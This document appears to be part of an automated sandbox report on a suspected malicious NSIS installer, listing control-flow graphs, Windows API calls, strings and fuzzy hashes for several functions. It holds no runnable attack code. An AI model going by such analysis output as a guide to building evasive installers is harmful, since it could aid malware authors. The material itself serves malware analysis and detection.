                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                                          Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                          • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                          • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                          • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                                          Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                          • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                          • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                          • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                          • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                          • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,SurplusBallotRhAloneComplexity,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,SurplusBallotRhAloneComplexity,SurplusBallotRhAloneComplexity,00000000,00000000,SurplusBallotRhAloneComplexity,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,756F23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,756F23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$SurplusBallotRhAloneComplexity
                                                                                                                                                                                                                                                                                                          • API String ID: 4286501637-3349193586
                                                                                                                                                                                                                                                                                                          • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                                                                                                                                                                                                                                          Function 0040337F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 175fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00426176,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                                                          • String ID: (]C$... %d%%$pAB$vaB$y!B
                                                                                                                                                                                                                                                                                                          • API String ID: 651206458-3902754529
                                                                                                                                                                                                                                                                                                          • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                          • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                                                                                                                                                                                                                                          Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 647 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 650 403603-403608 647->650 651 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 647->651 652 4037e2-4037e6 650->652 659 403641 651->659 660 403728-403736 call 4032d2 651->660 662 403646-40365d 659->662 666 4037f1-4037f6 660->666 667 40373c-40373f 660->667 664 403661-403663 call 403336 662->664 665 40365f 662->665 671 403668-40366a 664->671 665->664 666->652 669 403741-403759 call 403368 call 403336 667->669 670 40376b-403795 GlobalAlloc call 403368 call 40337f 667->670 669->666 698 40375f-403765 669->698 670->666 696 403797-4037a8 670->696 674 403670-403677 671->674 675 4037e9-4037f0 call 4032d2 671->675 676 4036f3-4036f7 674->676 677 403679-40368d call 405e38 674->677 675->666 683 403701-403707 676->683 684 4036f9-403700 call 4032d2 676->684 677->683 694 40368f-403696 677->694 687 403716-403720 683->687 688 403709-403713 call 4072ad 683->688 684->683 687->662 695 403726 687->695 688->687 694->683 700 403698-40369f 694->700 695->660 701 4037b0-4037b3 696->701 702 4037aa 696->702 698->666 698->670 700->683 703 4036a1-4036a8 700->703 704 4037b6-4037be 701->704 702->701 703->683 705 4036aa-4036b1 703->705 704->704 706 4037c0-4037db SetFilePointer call 405e38 704->706 705->683 707 4036b3-4036d3 705->707 710 4037e0 706->710 707->666 709 4036d9-4036dd 707->709 711 4036e5-4036ed 709->711 712 4036df-4036e3 709->712 710->652 711->683 713 4036ef-4036f1 711->713 712->695 712->711 713->683
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                          • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                          • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
